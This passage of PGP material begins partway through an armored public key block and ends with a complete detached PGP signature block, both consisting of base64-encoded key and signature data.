aHRsaW9ubGVha0Bwcm90b25tYWlsLmNvbT6JAVQEEwEIAD4WIQS2v9uj7Yt7p8zR S4GrU+f8zO+yuQUCXwXCPwIbAwUJA8JL8QULCQgHAgYVCgkICwIEFgIDAQIeAQIX gAAKCRCrU+f8zO+yuZxXB/9CweUhcscUVT3a2ffoBsrsQq7bJrFe5jUPeMaHi0KO evAezH/DlEbKxRlZ+zMFazxd/FjsExIyWl+VBxPkUuQq1NbjSELbDR4Yz+J/V8SS saUBCntBFoKF3QHjOK1hT+aw21bJsnQumVqqIWI458WSh+SjGc/Y2VYty3raIWV8 gquxW9UMDsEnhDStOI2Zgtvm+EShhAZb7XBj2nSBqxssRJ8PsVZnvuNnpXMsakQ5 X+aJILFfK9W5ocW15LxU+WwRojACvLxpXpJN9ZcBYfM0yFdX/Wemj9xh5z4CZ+uN 2EZ7immPb+rwvday6Fbc/8JBtEOcQtMIY08sDNV9AEixuQENBF8Fwj8BCAC6HjxH KL2c/IfzLsdVVaDW/ZWqkETkC5sh97khLvofM1Pnmm9Mn8PkFEEPWojFaTRpfRI5 6EmI9KhIYpcMU9wjFe5+oVfsqsF+l+tbjmO8yPTDW/PwlxUvDc3RnvQ0XZ27g1pI +VVaN3zmJ/uKR1KIsIaUi10Bv4kBoYt9gib9wiGMb/LTdJv7jASA4gx7zSHmOsIV 
AR91aYeCEvETK7hVfrf0ejGQf15or51/Fp+KuxMIClFkKUpoM1doC26SbdScOk9Z EulW5a2piOymSs23v3yW63yx3gVr7UAlfEbQ93SvMDWg9jU4ywuSAA0X0t/2V9jX j2dy5Y/kJAUyDpUZABEBAAGJATwEGAEIACYWIQS2v9uj7Yt7p8zRS4GrU+f8zO+y uQUCXwXCPwIbDAUJA8JL8QAKCRCrU+f8zO+yuSZHCACfodSLFmSYGSDXuUj1mlDi vQyHD1il7mJ9JkmIj8h3s9qsLNYeX4awbSh9C0clXM3fc1kMNyGzAvBkQ5RESZF4 C26b7UObQfig+Q1/NKU3JRJ4POf4xubJnKV7bMuc0w4pVRtsb2OQD0X20SmCmhZ9 kaqe69sy4XhE5gqh5zUEig5dR2VBZGAPBGgPkdQ/xuNFnJLvT6flzvVkcJQd6L/x Y+P//gnyLUuXepkcO9tk+HKUUr3XxCgcCGObtrSLbqa+vvZoV9jCA+48QgkbgolX JN7SHbShpvPmB6u+ZBx4h3I1cb077FTeQYDTLa2Hp3fv0x2lrbTTQMCSMw2wc8/P =NG59 - -----END PGP PUBLIC KEY BLOCK----- -----BEGIN PGP SIGNATURE----- iQEzBAEBCAAdFiEEtr/bo+2Le6fM0UuBq1Pn/MzvsrkFAl8LI8kACgkQq1Pn/Mzv srkClwgAiuu9FfmXTmgzkeGAzM87v3A1p0lQbAg6v6t7sTsI4xESwVgdrvXTfr+R uiR/Lqic95suITSflSnnTm6J7qX1giEPd4kp1aEAabM/V/UryDLLNRDdgcPxrbWJ wV2zbiz1uVx0OJ00IbGspjpdu5jgREdolkJRe/TD6nPRwPfgIq/TjkXQKE9TeylW 5+tTS6taeLjNB/lDyZoPn+7zB+P3KGysXhG4aE4Zm0hragsmfpTJ3ghP/WLCztqZ KerBJzJEED8uzAtp2in0GjYf0Ql/BNg+Cze7BbJb8Hn8jTQ5ArZjLmJ/SI2DYYXC mce17l1UGl7QTaQCDOrBj7IMkD4hSQ== =0Abk -----END PGP SIGNATURE-----